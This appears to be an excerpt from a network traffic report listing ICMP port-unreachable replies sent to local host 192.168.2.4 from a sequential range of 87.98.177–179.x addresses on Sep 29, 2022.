                                                                                                        Sep 29, 2022 14:45:16.666486979 CEST87.98.177.26192.168.2.4c858(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.667841911 CEST87.98.177.35192.168.2.4c861(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.667865992 CEST87.98.177.23192.168.2.4c855(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.668925047 CEST87.98.177.48192.168.2.4c86e(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.668946981 CEST87.98.177.39192.168.2.4c865(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.668972015 CEST87.98.177.41192.168.2.4c867(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.669699907 CEST87.98.177.44192.168.2.4c86a(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.671217918 CEST87.98.177.61192.168.2.4c874(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.671614885 CEST87.98.177.59192.168.2.4c879(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.671634912 CEST87.98.177.62192.168.2.4c87c(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.671891928 CEST87.98.177.71192.168.2.4c885(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.671906948 CEST87.98.177.63192.168.2.4c87d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.672223091 CEST87.98.177.67192.168.2.4c881(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.672243118 CEST87.98.177.69192.168.2.4c883(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.673278093 CEST87.98.177.73192.168.2.4c887(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.673304081 CEST87.98.177.75192.168.2.4c889(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.673949003 CEST87.98.177.79192.168.2.4c88d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.682544947 CEST87.98.177.1192.168.2.4c83f(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.695506096 CEST87.98.177.83192.168.2.4c891(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.696202040 CEST87.98.177.88192.168.2.4c896(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.700988054 CEST87.98.177.107192.168.2.4c89f(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.703493118 CEST87.98.177.81192.168.2.4c88f(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.704385042 CEST87.98.177.86192.168.2.4c894(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.704670906 CEST87.98.177.89192.168.2.4c897(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.704778910 CEST87.98.177.95192.168.2.4c89d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.704796076 CEST87.98.177.96192.168.2.4c89e(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.708475113 CEST87.98.177.92192.168.2.4c89a(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.708492994 CEST87.98.177.108192.168.2.4c8aa(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.709568977 CEST87.98.177.109192.168.2.4c8ab(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.709701061 CEST87.98.177.110192.168.2.4c8ac(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.709806919 CEST87.98.177.116192.168.2.4c8b2(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.709943056 CEST87.98.177.115192.168.2.4c8b1(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.709956884 CEST87.98.177.135192.168.2.4c8c5(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.726119995 CEST87.98.177.124192.168.2.4c8ba(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.726140976 CEST87.98.177.126192.168.2.4c8bc(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.726155043 CEST87.98.177.132192.168.2.4c8c2(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.726164103 CEST87.98.177.165192.168.2.4c8e3(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.726172924 CEST87.98.177.137192.168.2.4c8c7(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.726181984 CEST87.98.177.141192.168.2.4c8cb(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.726191044 CEST87.98.177.142192.168.2.4c8cc(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.726201057 CEST87.98.177.102192.168.2.4c8a4(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.726208925 CEST87.98.177.146192.168.2.4c8d0(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.726217985 CEST87.98.177.159192.168.2.4c8dd(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.726231098 CEST87.98.177.153192.168.2.4c8d7(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.726242065 CEST87.98.177.157192.168.2.4c8db(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.726255894 CEST87.98.177.155192.168.2.4c8d2(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.726270914 CEST87.98.177.169192.168.2.4c8e7(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.726285934 CEST87.98.177.166192.168.2.4c8da(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.726300001 CEST87.98.177.167192.168.2.4c8e5(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.728869915 CEST87.98.177.174192.168.2.4c8ec(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.735268116 CEST87.98.177.185192.168.2.4c8f7(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.736584902 CEST87.98.177.202192.168.2.4c908(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.738993883 CEST87.98.177.214192.168.2.4c914(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.743732929 CEST87.98.177.198192.168.2.4c904(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.743767023 CEST87.98.177.193192.168.2.4c8ff(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.743824005 CEST87.98.177.203192.168.2.4c909(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.744523048 CEST87.98.177.204192.168.2.4c90a(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.744637966 CEST87.98.177.206192.168.2.4c90c(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.745119095 CEST87.98.177.207192.168.2.4c90d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.745147943 CEST87.98.177.210192.168.2.4c910(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.745609999 CEST87.98.177.211192.168.2.4c911(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.746001005 CEST87.98.177.219192.168.2.4c919(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.746026993 CEST87.98.177.220192.168.2.4c91a(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.746984005 CEST87.98.177.218192.168.2.4c918(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.747024059 CEST87.98.177.212192.168.2.4c912(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.747047901 CEST87.98.177.215192.168.2.4c915(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.747689009 CEST87.98.177.230192.168.2.4c924(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.748528004 CEST87.98.177.239192.168.2.4c92d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.755311012 CEST87.98.177.233192.168.2.4c91d(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.787364006 CEST87.98.177.253192.168.2.4c93b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.791455984 CEST87.98.177.243192.168.2.4c931(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.791501045 CEST87.98.177.244192.168.2.4c932(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:16.794487953 CEST87.98.177.250192.168.2.4c938(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.798312902 CEST87.98.178.12192.168.2.4c94a(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.800951004 CEST87.98.178.27192.168.2.4c959(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.803751945 CEST87.98.178.9192.168.2.4c947(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.804399967 CEST87.98.177.255192.168.2.4c93d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.806013107 CEST87.98.178.0192.168.2.4c93e(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.806971073 CEST87.98.178.19192.168.2.4c951(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.807323933 CEST87.98.178.13192.168.2.4c94b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.807342052 CEST87.98.178.21192.168.2.4c94c(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.807377100 CEST87.98.178.25192.168.2.4c957(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.807395935 CEST87.98.178.22192.168.2.4c954(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.808651924 CEST87.98.178.26192.168.2.4c958(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.808681011 CEST87.98.178.29192.168.2.4c95b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.808701038 CEST87.98.178.54192.168.2.4c974(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.808993101 CEST87.98.178.52192.168.2.4c972(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.810955048 CEST87.98.178.33192.168.2.4c95f(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.811372995 CEST87.98.178.36192.168.2.4c962(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.811976910 CEST87.98.178.37192.168.2.4c963(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.812004089 CEST87.98.178.39192.168.2.4c965(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.812634945 CEST87.98.178.38192.168.2.4c964(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.812767029 CEST87.98.178.35192.168.2.4c961(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.815192938 CEST87.98.178.44192.168.2.4c96a(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.816370964 CEST87.98.178.55192.168.2.4c975(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.816550016 CEST87.98.178.58192.168.2.4c978(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.817641973 CEST87.98.178.59192.168.2.4c979(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.817672968 CEST87.98.178.60192.168.2.4c97a(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.818191051 CEST87.98.178.62192.168.2.4c97c(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.818213940 CEST87.98.178.61192.168.2.4c97b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.821326971 CEST87.98.178.74192.168.2.4c988(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.821360111 CEST87.98.178.69192.168.2.4c979(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.821470976 CEST87.98.178.71192.168.2.4c985(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.822402954 CEST87.98.178.76192.168.2.4c983(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.822441101 CEST87.98.178.81192.168.2.4c98f(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.822468042 CEST87.98.178.79192.168.2.4c98d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.823168039 CEST87.98.178.120192.168.2.4c9b6(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.826430082 CEST87.98.178.89192.168.2.4c997(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.826456070 CEST87.98.178.90192.168.2.4c998(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.826473951 CEST87.98.178.95192.168.2.4c99d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.826508999 CEST87.98.178.97192.168.2.4c99f(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.826529980 CEST87.98.178.106192.168.2.4c9a8(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.826546907 CEST87.98.178.99192.168.2.4c9a1(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.831298113 CEST87.98.178.121192.168.2.4c9b7(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.831662893 CEST87.98.178.122192.168.2.4c9b8(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.848251104 CEST87.98.178.145192.168.2.4c9cf(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.851695061 CEST87.98.178.125192.168.2.4c9bb(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.852710962 CEST87.98.178.130192.168.2.4c9c0(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.853559017 CEST87.98.178.131192.168.2.4c9c1(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.856223106 CEST87.98.178.146192.168.2.4c9d0(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.857479095 CEST87.98.178.148192.168.2.4c9d2(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.857736111 CEST87.98.178.152192.168.2.4c9d6(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.858242035 CEST87.98.178.176192.168.2.4c9ee(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.859177113 CEST87.98.178.181192.168.2.4c9f3(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.859338999 CEST87.98.178.159192.168.2.4c9dd(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.860408068 CEST87.98.178.186192.168.2.4c9f8(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.861303091 CEST87.98.178.190192.168.2.4c9fc(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.861745119 CEST87.98.178.172192.168.2.4c9ea(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.862272024 CEST87.98.178.193192.168.2.4c9ff(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.862293959 CEST87.98.178.167192.168.2.4c9e5(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.863769054 CEST87.98.178.178192.168.2.4c9f0(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.863791943 CEST87.98.178.173192.168.2.4c9eb(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.869347095 CEST87.98.178.183192.168.2.4c9f5(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.869374037 CEST87.98.178.188192.168.2.4c9fa(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.869405031 CEST87.98.178.184192.168.2.4c9f6(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.869429111 CEST87.98.178.189192.168.2.4c9fb(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.870436907 CEST87.98.178.194192.168.2.4ca00(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.871618032 CEST87.98.178.197192.168.2.4ca03(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.871856928 CEST87.98.178.195192.168.2.4ca01(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.872442007 CEST87.98.178.199192.168.2.4ca05(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.873385906 CEST87.98.178.206192.168.2.4ca0c(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.873656988 CEST87.98.178.205192.168.2.4ca0b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.873698950 CEST87.98.178.207192.168.2.4ca0d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.873987913 CEST87.98.178.208192.168.2.4ca0e(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.874588966 CEST87.98.178.213192.168.2.4ca0c(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.874896049 CEST87.98.178.241192.168.2.4ca2f(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.875185966 CEST87.98.178.212192.168.2.4ca0b(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.875538111 CEST87.98.178.214192.168.2.4ca14(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.878724098 CEST87.98.178.225192.168.2.4ca1f(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.879621029 CEST87.98.178.234192.168.2.4ca28(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.879957914 CEST87.98.178.236192.168.2.4ca2a(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.880912066 CEST87.98.178.237192.168.2.4ca2b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.881602049 CEST87.98.178.240192.168.2.4ca2e(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.882900000 CEST87.98.178.247192.168.2.4ca2e(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.882985115 CEST87.98.178.246192.168.2.4ca34(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.883495092 CEST87.98.178.249192.168.2.4ca37(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.884869099 CEST87.98.178.251192.168.2.4ca2f(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:17.885488987 CEST87.98.178.254192.168.2.4ca3c(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.664974928 CEST192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.891005993 CEST87.98.179.3192.168.2.4ca41(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.893565893 CEST87.98.179.13192.168.2.4ca4b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.898562908 CEST87.98.178.255192.168.2.4ca3d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.898981094 CEST87.98.179.0192.168.2.4ca3e(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.899035931 CEST87.98.179.5192.168.2.4ca43(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.899080038 CEST87.98.179.4192.168.2.4ca42(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.900515079 CEST87.98.179.8192.168.2.4ca46(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.900574923 CEST87.98.179.14192.168.2.4ca4c(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.900614977 CEST87.98.179.20192.168.2.4ca52(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.900655985 CEST87.98.179.24192.168.2.4ca56(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.900696993 CEST87.98.179.82192.168.2.4ca89(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.902340889 CEST87.98.179.31192.168.2.4ca5d(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.902394056 CEST87.98.179.30192.168.2.4ca5c(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.902436018 CEST87.98.179.37192.168.2.4ca63(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.902477026 CEST87.98.179.29192.168.2.4ca5b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.902740955 CEST87.98.179.106192.168.2.4caa8(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.902784109 CEST87.98.179.34192.168.2.4ca60(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.902992964 CEST87.98.179.45192.168.2.4ca6b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.903038025 CEST87.98.179.44192.168.2.4ca6a(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.903283119 CEST87.98.179.41192.168.2.4ca67(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.903887987 CEST87.98.179.53192.168.2.4ca73(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.904082060 CEST87.98.179.51192.168.2.4ca71(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.904366016 CEST87.98.179.50192.168.2.4ca70(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.904522896 CEST87.98.179.56192.168.2.4ca76(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.904838085 CEST87.98.179.54192.168.2.4ca74(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.905044079 CEST87.98.179.58192.168.2.4ca71(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.905750036 CEST87.98.179.66192.168.2.4ca80(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.906240940 CEST87.98.179.70192.168.2.4ca84(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.906713009 CEST87.98.179.60192.168.2.4ca73(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.906758070 CEST87.98.179.78192.168.2.4ca8c(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.906986952 CEST87.98.179.69192.168.2.4ca83(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.908736944 CEST87.98.179.76192.168.2.4ca8a(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.908763885 CEST87.98.179.80192.168.2.4ca8e(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.910686016 CEST87.98.179.96192.168.2.4ca9e(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.910712957 CEST87.98.179.99192.168.2.4caa1(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.910732985 CEST87.98.179.105192.168.2.4caa7(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.910868883 CEST87.98.179.107192.168.2.4caa9(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.911413908 CEST87.98.179.109192.168.2.4caa4(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.911437988 CEST87.98.179.112192.168.2.4caae(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.911457062 CEST87.98.179.113192.168.2.4caaf(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.911477089 CEST87.98.179.104192.168.2.4caa6(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.912103891 CEST87.98.179.93192.168.2.4ca9b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.912934065 CEST87.98.179.118192.168.2.4cab4(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.913132906 CEST87.98.179.115192.168.2.4cab1(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.913156033 CEST87.98.179.119192.168.2.4cab5(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.913475037 CEST87.98.179.123192.168.2.4cab2(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.913499117 CEST87.98.179.125192.168.2.4cabb(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.914258957 CEST87.98.179.137192.168.2.4cac7(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.914283037 CEST87.98.179.135192.168.2.4cac5(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.914793015 CEST87.98.179.142192.168.2.4cacc(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.915421009 CEST87.98.179.136192.168.2.4cac6(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.923048019 CEST87.98.179.153192.168.2.4cad7(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.930736065 CEST87.98.179.149192.168.2.4cad3(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.930851936 CEST87.98.179.159192.168.2.4cad6(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.930898905 CEST87.98.179.155192.168.2.4cacf(Unknown)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.930927038 CEST87.98.179.162192.168.2.4cae0(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.931870937 CEST87.98.179.166192.168.2.4cae4(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.932674885 CEST87.98.179.164192.168.2.4cae2(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.932791948 CEST87.98.179.160192.168.2.4cade(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.932838917 CEST87.98.179.171192.168.2.4cae9(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.933604002 CEST87.98.179.173192.168.2.4caeb(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.975048065 CEST87.98.179.188192.168.2.4cafa(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.976294041 CEST87.98.179.187192.168.2.4caf9(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.976363897 CEST87.98.179.189192.168.2.4cafb(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.976418018 CEST87.98.179.196192.168.2.4cb02(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.976901054 CEST87.98.179.201192.168.2.4cb07(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.976954937 CEST87.98.179.199192.168.2.4cb05(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.977762938 CEST87.98.179.206192.168.2.4cb0c(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.978157997 CEST87.98.179.210192.168.2.4cb10(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.978296041 CEST87.98.179.213192.168.2.4cb13(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.978552103 CEST87.98.179.214192.168.2.4cb14(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.978601933 CEST87.98.179.216192.168.2.4cb16(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.978763103 CEST87.98.179.218192.168.2.4cb18(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.979010105 CEST87.98.179.221192.168.2.4cb1b(Port unreachable)Destination Unreachable
                                                                                                        Sep 29, 2022 14:45:18.979057074 CEST87.98.179.222192.168.2.4cb1c(Port unreachable)Destination Unreachable
